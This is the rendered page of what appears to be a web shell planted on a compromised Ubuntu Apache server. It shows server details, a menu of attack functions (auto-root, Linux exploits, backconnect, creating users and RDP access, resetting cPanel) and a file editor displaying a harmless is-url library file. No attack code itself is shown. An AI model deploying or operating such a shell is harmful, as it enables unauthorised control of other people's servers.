Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.159.119.56
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
isurl /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
index.js
1.01
KB
-rw-r--r--
props.js
343
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
"use strict"; const hasToStringTag = require("has-to-string-tag-x"); const isObject = require("is-object"); const isURLSearchParams = require("is-urlsearchparams"); const {lenientProperties, strictProperties} = require("./props"); const searchParams = "searchParams"; const toStringTag = Object.prototype.toString; const urlClass = "[object URL]"; const isURL = (url, supportIncomplete=false) => { if (!isObject(url)) { return false; } else if (hasToStringTag && toStringTag.call(url)!==urlClass) { // Shimmed implementation with incorrect constructor name return false; } else if (!strictProperties.every(prop => prop in url)) { return false; } else if (supportIncomplete && searchParams in url) { return isURLSearchParams.lenient(url.searchParams); } else if (supportIncomplete) { return true; } else if (lenientProperties.every(prop => prop in url)) { return isURLSearchParams(url.searchParams); } else { return false; } }; isURL.lenient = url => isURL(url, true); module.exports = isURL;
Close